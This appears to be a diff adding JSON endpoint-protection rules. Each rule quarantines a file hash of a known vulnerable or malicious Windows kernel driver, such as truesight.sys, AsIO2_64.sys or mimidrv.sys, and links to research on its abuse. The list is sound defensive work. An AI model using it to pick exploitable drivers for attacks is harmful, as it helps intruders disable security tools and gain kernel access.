+ "id": "023a4130-a2e0-57af-9545-06a253b1cd65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834214Z",
+ "creation_date": "2026-03-23T11:45:30.834217Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834225Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fc9c62312b035c2b954ee633b3e6c5cc7c5cca3e8c03b3818db49f69020185b7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0244398e-db56-5e38-ab46-58c36fda2e2d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145546Z",
+ "creation_date": "2026-03-23T11:45:32.145549Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145555Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a1f79a2e1441970bb3e7c838f8c14a8f3d39a46b0ff9648614e922ac475c743d",
+ "comment": "Vulnerable Kernel Driver (aka ADRMDRVSYS.sys) [https://www.loldrivers.io/drivers/48aeea9b-7812-4b25-9835-baaebe7dc551/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "024bed7d-e9ba-58a8-a5ba-2e132030e4ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621686Z",
+ "creation_date": "2026-03-23T11:45:29.621688Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621693Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "48891874441c6fa69e5518d98c53d83b723573e280c6c65ccfbde9039a6458c9",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "025c31d8-a310-58bc-9d95-e2d49f2e917e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480544Z",
+ "creation_date": "2026-03-23T11:45:30.480546Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480551Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37b0aaf4e3cdc9d4c475a3a08ad2ba1e28e177d7359546c9b0bba14ae73dfed0",
+ "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0263d854-319f-5b8b-b575-ab9a1bc1f3f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829341Z",
+ "creation_date": "2026-03-23T11:45:30.829343Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829348Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a35bcff21cb4869740ebf64cb6316c28acef3fbd03e33c38f4a97c9ea442dde1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0266b22b-3019-5aab-bf3d-282d4cea4c72",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480010Z",
+ "creation_date": "2026-03-23T11:45:30.480012Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480018Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "655110646bff890c448c0951e11132dc3592bda6e080696341b930d090224723",
+ "comment": "Vulnerable Kernel Driver (aka gpcidrv64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0266cec8-c150-5aa8-b4d4-992fdb7759a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483752Z",
+ "creation_date": "2026-03-23T11:45:31.483756Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483766Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f6f3379b18b84b4bfe6ab0f5e332956f6f87ca5062aa3acd4739d9a6d3c33392",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "026d57f8-faaa-552f-ae4b-c54e7a8f8528",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621530Z",
+ "creation_date": "2026-03-23T11:45:29.621532Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621537Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7236c8ff33c0e5cfa956778aa7303f1979f3bf709c361399fa1ce101b7e355b8",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "027a1ffb-92c1-5578-876a-1456143ef7ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469951Z",
+ "creation_date": "2026-03-23T11:45:30.469954Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469964Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16274f4d9293fff056268a2d53c1a2e27db26d6b643f24651b5f2a0c055b7f40",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "027d6a6a-7489-5e2f-b40d-df770288208b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479984Z",
+ "creation_date": "2026-03-23T11:45:31.479988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479997Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19429c971c279d564c84b24efadc66a0ccdea4e45cf0f795fb59f7b0e46387b0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0283cc9a-8dbe-577b-86d7-04cb2857605c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488240Z",
+ "creation_date": "2026-03-23T11:45:31.488242Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488248Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a76f8d98f689166abfb86c50ff83f3f8693404f7c457de48d04cb6ccd4887ef5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "029772cd-05a0-58d0-9ad1-dd415300042b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488925Z",
+ "creation_date": "2026-03-23T11:45:31.488927Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488932Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f2e64bd2c50f6032e070776b3687f7e3cb0a5c02c10ca54176ce7877c5bdf9c9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "029f8029-e5b3-59c0-b1f0-57af43acad0e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144700Z",
+ "creation_date": "2026-03-23T11:45:31.144702Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144708Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "552ed099bb06f83c3a41a8963556800ec5a579be4f51bd5df9b945520a584d4c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02adc0e1-b524-5bab-acad-928666181a01",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160952Z",
+ "creation_date": "2026-03-23T11:45:31.160954Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160960Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31ec72cdcf6dd4eb8642f8546cb9995a5f5c7d0afd5b89fad961697676e6ca8a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02beeddf-cf27-5c70-b160-e06e0539a9ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500064Z",
+ "creation_date": "2026-03-23T11:45:31.500067Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500075Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77641e765a14d98a2f06cb05400eddb086d49bdff7d809f193266a2ba0516113",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02c3a900-6337-515e-ba02-ec79052cb575",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826901Z",
+ "creation_date": "2026-03-23T11:45:30.826904Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826909Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8291a0fdd796f6fe82fccbe4c7ee4dcc7d8e4927d40abe18ebcc61a9cb16fb1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02c7fc85-ee32-5340-b2c7-3717749fedbe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477519Z",
+ "creation_date": "2026-03-23T11:45:30.477522Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477532Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16b591cf5dc1e7282fdb25e45497fe3efc8095cbe31c05f6d97c5221a9a547e1",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02cda463-0ae0-5464-ab49-618f1c7f918f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479862Z",
+ "creation_date": "2026-03-23T11:45:30.479864Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479881Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0dcdbdc62949c981c4fc04ccea64be008676d23506fc05637d9686151a4b77f",
+ "comment": "Vulnerable NVIDIA Kernel Driver (aka nvoclock.sys) [https://github.com/zer0condition/NVDrv] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02d2dd45-fc87-5295-ab1f-6c182b37e5b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148700Z",
+ "creation_date": "2026-03-23T11:45:31.148703Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148711Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b6ff9674ce64230ea72ef866594640115a7560d2ce969f24ff15e1cd818c5cb6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02d36425-67b5-56c6-b285-9ea08ee85b87",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615118Z",
+ "creation_date": "2026-03-23T11:45:29.615120Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615125Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7893307df2fdde25371645a924f0333e1b2de31b6bc839d8e2a908d7830c6504",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02db34b9-8176-56cc-9398-df47a51ebb2f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155258Z",
+ "creation_date": "2026-03-23T11:45:31.155260Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155266Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "06bb219d68e32c270b3cbaae0fd053c39febb0b6ae6f72df347e49c29c5183f8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02dc9788-6aeb-5161-9bad-2c97e18b50ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825448Z",
+ "creation_date": "2026-03-23T11:45:30.825450Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825456Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c9f9f49d85991f002fdeb6cf8424e5db99edc6e1ce3b9e28841307a497312dc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02e43f36-0536-5d7c-8043-8dfeb7088a50",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
